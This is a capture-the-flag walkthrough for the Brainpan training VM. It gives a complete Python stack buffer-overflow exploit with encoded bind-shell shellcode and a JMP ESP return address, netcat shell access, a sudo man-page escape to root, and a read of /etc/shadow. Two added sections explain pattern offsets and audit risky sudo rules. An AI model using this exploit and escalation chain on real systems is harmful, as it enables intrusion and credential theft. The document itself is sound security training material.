BRAINPAN PENTEST VM SOLUTION BY 1N3
# OVERVIEW
Brainpan is a test VM used for pentesting/hacking simulations. For more info, go to http://blog.techorganic.com/2013/03/brainpan-hacking-challenge.html. This walkthrough covers the basic steps to obtain "root" access to Brainpan.
# DISCOVER HOSTS
netdiscover -r 192.168.1.0/24
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
192.168.1.132 00:0c:29:90:72:0d 01 060 VMware, Inc.
# PORT SCAN
nmap -sV 192.168.1.132
Nmap scan report for 192.168.1.132
Host is up (0.00041s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
9999/tcp open abyss?
10000/tcp open http SimpleHTTPServer 0.6 (Python 2.7.3)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
MAC Address: 00:0C:29:90:72:0D (VMware)
# DIRBUSTER
#scan 192.168.1.132:10000 with dirbuster
dirbuster &
# dirbuster shows a static index.html page, a static image file, a bin directory and a brainpan.exe within the brainpan directory.
# DOWNLOAD brainpan.exe
wget http://192.168.1.132:10000/bin/brainpan.exe
# RUN brainpan.exe FROM WINE...
wine brainpan.exe
[+] initializing winsock...done.
[+] server socket created.
[!] bind failed: 10048[+] bind done on port 9999
[+] waiting for connections.
* FROM THIS, WE CAN DETERMINE THAT brainpan.exe IS RUNNING IN WINE FOR LINUX ON PORT 9999/TCP ON THE REMOTE HOST...
# DEBUGGING & FUZZING
# Transfer brainpan.exe to a Windows XP machine for debugging with OllyDbg or Immunity Debugger. Find which bytes overwrite EIP and find a suitable JMP ESP address. Use msfvenom to create a bind shell for Linux using the brainpan IP. Create a working buffer overflow exploit (see below).
# GENERATE UNIQUE BUFFER
msf exploit(ms06_040_netapi) > ruby pattern_create.rb 1024
[*] exec: ruby pattern_create.rb 1024
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0B
#!/usr/bin/python
#Brainpan.exe fuzzer by 1N3 - 20131122
import socket
target = "192.168.1.119"
# 1024-byte unique pattern generated by pattern_create.rb
buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0B"
print "Fuzzing port 9999 with " +str(len(buffer))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((target,9999))
s.recv(1024)
print "Sending evil buffer..." + buffer
s.send(buffer)
s.close()
root@bt:/mnt/sdb/nonxero/scripts/fuzzers# ./brainpan_fuzz.py
Fuzzing port 9999 with 1024
Sending evil buffer...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0B
root@bt:/mnt/sdb/nonxero/scripts/fuzzers#
msf exploit(ms06_040_netapi) > ruby pattern_offset.rb 35724134
[*] exec: ruby pattern_offset.rb 35724134
[*] Exact match at offset 524
* This means EIP is overwritten by the 4 bytes starting at offset 524 (bytes 524-528 of the buffer)...
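Why the debugger value 35724134 corresponds to offset 524, as an added example that is not part of the original walkthrough and not Metasploit's code. The function names are chosen here for illustration, and `frame_layout` assumes a standard x86 stack frame:

```python
import string
import struct


def pattern_create(length):
    """Cyclic pattern in the Aa0Aa1...Zz9 layout seen in the walkthrough."""
    triples = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                triples.append(upper + lower + digit)
                if len(triples) * 3 >= length:
                    return "".join(triples)[:length]
    raise ValueError("pattern is only unique up to 20280 bytes")


def pattern_offset(register_hex, length=1024):
    """Offset of a 32-bit register value (debugger notation) in the pattern.

    x86 is little-endian, so EIP=35724134 was loaded from the bytes
    34 41 72 35, i.e. the text "4Ar5". Returns -1 if the value is not
    part of the pattern (the crash did not come from this input).
    """
    needle = struct.pack("<I", int(register_hex, 16))
    return pattern_create(length).encode("ascii").find(needle)


def frame_layout(eip_offset):
    """Map the offset onto the buffer pieces named in the walkthrough's script.

    Assumption: saved EBP sits directly below the return address, which is
    why the script places 4 bytes called `ebp` after 520 bytes of filler.
    """
    return {
        "filler": (0, eip_offset - 4),
        "saved_ebp": (eip_offset - 4, eip_offset),
        "return_address": (eip_offset, eip_offset + 4),
    }


if __name__ == "__main__":
    off = pattern_offset("35724134")
    print("offset:", off)
    print(frame_layout(off))
```

The same lookup is useful in crash triage: a faulting address that decodes to pattern text shows that the crash is input-controlled and how far into the input the overwrite begins.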
# CONSTRUCT OUR SHELLCODE...
msfvenom -p linux/x86/shell_bind_tcp LHOST=192.168.1.132 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai
[*] x86/shikata_ga_nai succeeded with size 105 (iteration=1)
buf =
"\xda\xcd\xd9\x74\x24\xf4\xbf\x7d\x7b\x06\xd9\x5d\x33\xc9" +
"\xb1\x14\x83\xed\xfc\x31\x7d\x15\x03\x7d\x15\x9f\x8e\x37" +
"\x02\xa8\x92\x6b\xf7\x05\x3f\x8e\x7e\x48\x0f\xe8\x4d\x0a" +
"\x2b\xab\x1f\x62\xce\x53\xb1\x2e\xa4\x43\xe0\x9e\xb1\x85" +
"\x68\x78\x9a\x88\xed\x0d\x5b\x17\x5d\x09\xec\x71\x6c\x91" +
"\x4f\xce\x08\x5c\xcf\xbd\x8c\x34\xef\x99\xe3\x48\x46\x63" +
"\x04\x20\x76\xbc\x87\xd8\xe0\xed\x05\x71\x9f\x78\x2a\xd1" +
"\x0c\xf2\x4c\x61\xb9\xc9\x0f"
# CREATE THE EXPLOIT...
#!/usr/bin/python
# brainpan_exploit.py by 1N3 - 20131121
import socket
import os
import subprocess
# vars
target = "192.168.1.132"
buffer1 = '\x41' * 520
ebp = '\x90' * 4
EIP = "\xf3\x12\x17\x31" #311712F3 JMP ESP brainpan.exe
command = "nc -vv 192.168.1.132 4444"
#shellcode bind shell port 4444 192.168.1.132
shellcode = ("\xd9\xea\xd9\x74\x24\xf4\xbb\xda\x05\x64\xb7\x5a\x29\xc9" +
"\xb1\x14\x31\x5a\x19\x03\x5a\x19\x83\xc2\x04\x38\xf0\x55" +
"\x6c\x4b\x18\xc6\xd1\xe0\xb5\xeb\x5c\xe7\xfa\x8a\x93\x67" +
"\xa1\x0c\x7e\x0f\x54\xb1\x6f\x93\x32\xa1\xde\x7b\x4a\x20" +
"\x8a\x1d\x14\x6e\xcb\x68\xe5\x74\x7f\x6e\x56\x12\xb2\xee" +
"\xd5\x6b\x2a\x23\x59\x18\xea\xd1\x65\x47\xc0\xa5\xd3\x0e" +
"\x22\xcd\xcc\xdf\xa1\x65\x7b\x0f\x24\x1c\x15\xc6\x4b\x8e" +
"\xba\x51\x6a\x9e\x36\xaf\xed")
# NOOP sled
NOOP_sled = '\x90' * 104
# construct entire buffer - 737 bytes (520 + 4 + 4 + 104 + 105)
buffer = buffer1 + ebp + EIP + NOOP_sled + shellcode
print "**********************************************"
print "buffer1 length: " +str(len(buffer1))
print "EIP length: " +str(len(EIP))
print "shellcode length: " +str(len(shellcode))
print "NOOP_sled length: " +str(len(NOOP_sled))
print "Total buffer length: " +str(len(buffer))
print "**********************************************"
print "Fuzzing " + target + " on port 9999 with " +str(len(buffer)) + " bytes"
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((target,9999))
s.recv(1024)
print "Sending evil buffer..." + buffer
s.send(buffer)
print "Done..."
print "Connecting to bind shell..."
# run nc through the shell; subprocess.call() with a plain command string fails without shell=True
os.system(command)
print "Done..."
s.close()
# EXPLOIT
root@bt:/scripts/fuzzers# ./brainpan_exploit.py
**********************************************
buffer1 length: 520
EIP length: 4
shellcode length: 105
NOOP_sled length: 104
Total buffer length: 737
**********************************************
Fuzzing 192.168.1.132 on port 9999 with 737 bytes
Sending evil buffer...[raw payload bytes, not printable]
Done...
Connecting to bind shell...
nc -vv 192.168.1.132 4444
whoami
puck
pwd
/home/puck/web
# DISTRO VERSION
cat /etc/release
Ubuntu 12.10
uname -a
Linux version 3.5.0-25-generic
# PROCESSES
ps -auxxx
root 732 1 0 06:47 ? 00:00:00 /usr/sbin/winbindd -F
root 838 732 0 06:47 ? 00:00:00 /usr/sbin/winbindd -F
...
...
puck 910 909 0 06:47 ? 00:00:00 /bin/sh -c /home/puck/checksrv.sh
puck 911 910 0 06:47 ? 00:00:00 /bin/bash /home/puck/checksrv.sh
puck 926 911 0 06:47 ? 00:00:02 /usr/bin/python -m SimpleHTTPServer 10000
puck 1693 1 0 08:49 ? 00:00:00 /bin//sh
puck 1949 1 0 08:53 ? 00:00:00 /home/puck/web/bin/brainpan.exe
puck 1953 1 0 08:53 ? 00:00:00 /usr/bin/wineserver
puck 1959 1 0 08:53 ? 00:00:00 C:\windows\system32\services.exe
puck 1963 1 0 08:53 ? 00:00:00 C:\windows\system32\winedevice.exe MountMgr
puck 1972 1 0 08:53 ? 00:00:00 C:\windows\system32\plugplay.exe
# CRONTAB
cat /etc/crontab
# what can I do with this? file is owned by root and run by root but how to edit?
# m h dom mon dow command
* * * * * /home/puck/checksrv.sh
# SHOW LAST USERS TO LOGIN
#
last
root tty1 Mon Mar 4 13:43 - 13:43 (00:00)
anansi tty3 Mon Mar 4 12:17 - 13:38 (01:20)
anansi tty3 Mon Mar 4 12:17 - 12:17 (00:00)
puck tty3 Mon Mar 4 11:30 - 12:17 (00:47)
puck tty3 Mon Mar 4 11:30 - 11:30 (00:00)
puck tty2 Mon Mar 4 11:07 - 13:38 (02:30)
puck tty2 Mon Mar 4 11:07 - 11:07 (00:00)
anansi tty2 Mon Mar 4 11:03 - 11:07 (00:04)
anansi tty2 Mon Mar 4 11:03 - 11:03 (00:00)
anansi tty2 Mon Mar 4 10:58 - 10:59 (00:01)
anansi tty2 Mon Mar 4 10:58 - 10:58 (00:00)
reynard tty1 Mon Mar 4 10:48 - 13:43 (02:54)
reynard tty1 Mon Mar 4 10:48 - 10:48 (00:00)
# USERS
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
reynard:x:1000:1000:Reynard,,,:/home/reynard:/bin/bash
anansi:x:1001:1001:Anansi,,,:/home/anansi:/bin/bash
puck:x:1002:1002:Puck,,,:/home/puck:/bin/bash
# SEARCH HOME DIRECTORY FILES
ls -lhaR /home/
/home/puck/.wine:
total 816K
drwxrwxr-x 4 puck puck 4.0K Nov 19 08:53 .
drwx------ 11 puck puck 4.0K Nov 19 08:51 ..
-rw-rw-r-- 1 puck puck 11 Mar 4 2013 .update-timestamp
drwxrwxr-x 2 puck puck 4.0K Mar 4 2013 dosdevices
drwxrwxr-x 5 puck puck 4.0K Mar 4 2013 drive_c
-rw-rw-r-- 1 puck puck 761K Nov 19 08:53 system.reg
-rw-rw-r-- 1 puck puck 26K Nov 19 08:53 user.reg
-rw-rw-r-- 1 puck puck 2.1K Mar 4 2013 userdef.reg
/home/puck/.wine/dosdevices:
total 8.0K
drwxrwxr-x 2 puck puck 4.0K Mar 4 2013 .
drwxrwxr-x 4 puck puck 4.0K Nov 19 08:53 ..
lrwxrwxrwx 1 puck puck 10 Mar 4 2013 c: -> ../drive_c
lrwxrwxrwx 1 puck puck 1 Mar 4 2013 z: -> /
/home/puck/.wine/drive_c:
total 20K
drwxrwxr-x 5 puck puck 4.0K Mar 4 2013 .
drwxrwxr-x 4 puck puck 4.0K Nov 19 08:53 ..
drwxrwxr-x 4 puck puck 4.0K Mar 4 2013 Program Files
drwxrwxr-x 4 puck puck 4.0K Mar 4 2013 users
drwxrwxr-x 13 puck puck 4.0K Mar 4 2013 windows
/home/puck/.wine/drive_c/Program Files:
total 16K
drwxrwxr-x 4 puck puck 4.0K Mar 4 2013 .
drwxrwxr-x 5 puck puck 4.0K Mar 4 2013 ..
drwxrwxr-x 2 puck puck 4.0K Mar 4 2013 Common Files
drwxrwxr-x 2 puck puck 4.0K Mar 4 2013 Internet Explorer
/home/puck/.wine/drive_c/Program Files/Common Files:
/home/puck/web:
total 816K
drwxrwxr-x 3 puck puck 4.0K Mar 4 2013 .
drwx------ 11 puck puck 4.0K Nov 19 08:51 ..
drwxrwxr-x 2 puck puck 4.0K Mar 4 2013 bin
-rw-rw-r-- 1 puck puck 215 Mar 4 2013 index.html
-rw------- 1 puck puck 797K Mar 4 2013 soss-infographic-final.png
/home/puck/web/bin:
total 32K
drwxrwxr-x 2 puck puck 4.0K Mar 4 2013 .
drwxrwxr-x 3 puck puck 4.0K Mar 4 2013 ..
-rwxr-xr-x 1 puck puck 21K Mar 4 2013 brainpan.exe
# What development tools/languages are installed/supported?
which perl
which python
/usr/bin/perl
/usr/bin/python
# How can files be uploaded?
which wget
which nc
which netcat
which scp
which ftp
/usr/bin/wget
/bin/nc
/bin/netcat
/usr/bin/scp
/usr/bin/ftp
# RUNNING PORTS/SERVICES
# Both services running as user 'puck'... not sure that will help me get root....
lsof -i:9999
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
brainpan. 1949 puck 10u IPv4 26008 0t0 TCP *:9999 (LISTEN)
brainpan. 1949 puck 11u IPv4 26008 0t0 TCP *:9999 (LISTEN)
wineserve 1953 puck 27u IPv4 26008 0t0 TCP *:9999 (LISTEN)
lsof -i:10000
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
python 926 puck 3u IPv4 8661 0t0 TCP *:webmin (LISTEN)
# RUNNING SERVICES LOCALLY
netstat -luntp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:9999 0.0.0.0:* LISTEN 1756/brainpan.exe
tcp 0 0 0.0.0.0:10000 0.0.0.0:* LISTEN 924/python
udp 0 0 0.0.0.0:39859 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* - what's this port do?
udp6 0 0 :::22091 :::*
# BREAK OUT OF NETCAT SHELL TO BASH SHELL
python -c 'import pty;pty.spawn("/bin/bash")'
puck@brainpan:/home/puck/privesc$ ls
ls
allfiles.tar.gz linux_gather_files.sh linux_privesc_check
linux_checksec.sh linux_priv_esc.sh out
puck@brainpan:/home/puck/privesc$
# CHECK SUDO COMMANDS AVAILABLE
puck@brainpan:/home/puck$ sudo -l
sudo -l
Matching Defaults entries for puck on this host:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User puck may run the following commands on this host:
(root) NOPASSWD: /home/anansi/bin/anansi_util
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util man ls
sudo /home/anansi/bin/anansi_util man ls
'unknown': unknown terminal type.
# RUN SUDO COMMAND TO ENTER MAN PAGES
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util manual man
MAN(1) Manual pager utils MAN(1)
NAME
man - an interface to the on-line reference manuals
SYNOPSIS
man [-C file] [-d] [-D] [--warnings[=warnings]] [-R encoding] [-L
locale] [-m system[,...]] [-M path] [-S list] [-e extension] [-i|-I]
[--regex|--wildcard] [--names-only] [-a] [-u] [--no-subpages] [-P
pager] [-r prompt] [-7] [-E encoding] [--no-hyphenation] [--no-justifi‐
cation] [-p string] [-t] [-T[device]] [-H[browser]] [-X[dpi]] [-Z]
[[section] page ...] ...
man -k [apropos options] regexp ...
man -K [-w|-W] [-S list] [-i|-I] [--regex] [section] term ...
man -f [whatis options] page ...
man -l [-C file] [-d] [-D] [--warnings[=warnings]] [-R encoding] [-L
locale] [-P pager] [-r prompt] [-7] [-E encoding] [-p string] [-t]
[-T[device]] [-H[browser]] [-X[dpi]] [-Z] file ...
man -w|-W [-C file] [-d] [-D] page ...
man -c [-C file] [-d] [-D] page ...
man [-hV]
DESCRIPTION
Manual page man(1) line 1 (press h for help or q to quit)
DESCRIPTION
man is the system's manual pager. Each page argument given to man is
Manual page man(1) line 2 (press h for help or q to quit)!/bin/bash
# TYPE !/bin/bash TO EXECUTE COMMANDS WITHIN MAN PAGE (WHICH WILL RUN AS "ROOT")
!/bin/bash
root@brainpan:/usr/share/man# whoami
whoami
root
root@brainpan:/usr/share/man#
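The sudo rule behind this escalation is something an audit can catch. The following is an added example, not part of the original walkthrough: it parses `sudo -l` output and flags root rules whose binary lives outside root-owned system paths or is a pager. The sample input reproduces the lines shown above plus two constructed rules, and the prefix and pager lists are illustrative assumptions.

```python
import re

# Constructed sample: the `sudo -l` lines from the walkthrough, plus two
# made-up rules (a pager and a benign service restart) for comparison.
SUDO_L_OUTPUT = r"""
Matching Defaults entries for puck on this host:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User puck may run the following commands on this host:
    (root) NOPASSWD: /home/anansi/bin/anansi_util
    (root) NOPASSWD: /usr/bin/man
    (root) /usr/sbin/service ssh restart
"""

# "(runas) TAG: TAG: command[, command]" as printed by sudo -l
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")
USER_CONTROLLED = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")  # assumption
PAGERS = {"man", "less", "more"}  # interactive pagers accept "!command"


def parse_rules(text):
    """Return one dict per command granted in the sudo -l listing."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # Defaults lines and headers are not rules
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        runas = m.group("runas").split(":")[0].strip()
        for cmd in m.group("cmds").split(","):
            rules.append({"runas": runas, "tags": tags, "command": cmd.strip()})
    return rules


def audit(text):
    """Flag rules that hand out root through a replaceable or escapable binary."""
    findings = []
    for rule in parse_rules(text):
        if rule["runas"] not in ("root", "ALL"):
            continue
        binary = rule["command"].split()[0]
        reasons = []
        if binary == "ALL":
            reasons.append("unrestricted command set")
        if binary.startswith(USER_CONTROLLED):
            reasons.append("binary lives outside root-owned system paths")
        # NOEXEC stops a dynamically linked pager from spawning a shell
        if binary.rsplit("/", 1)[-1] in PAGERS and "NOEXEC" not in rule["tags"]:
            reasons.append("pager allows shell escape")
        if reasons:
            if "NOPASSWD" in rule["tags"]:
                reasons.append("no password required")
            findings.append((rule["command"], reasons))
    return findings


if __name__ == "__main__":
    for command, reasons in audit(SUDO_L_OUTPUT):
        print(command, "->", "; ".join(reasons))
```

A wrapper such as anansi_util cannot be judged by name alone, so a flagged custom binary still needs a manual check of what it executes on the caller's behalf.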
# GATHER /etc/shadow file
root@brainpan:/usr/share/man# cat /etc/shadow
cat /etc/shadow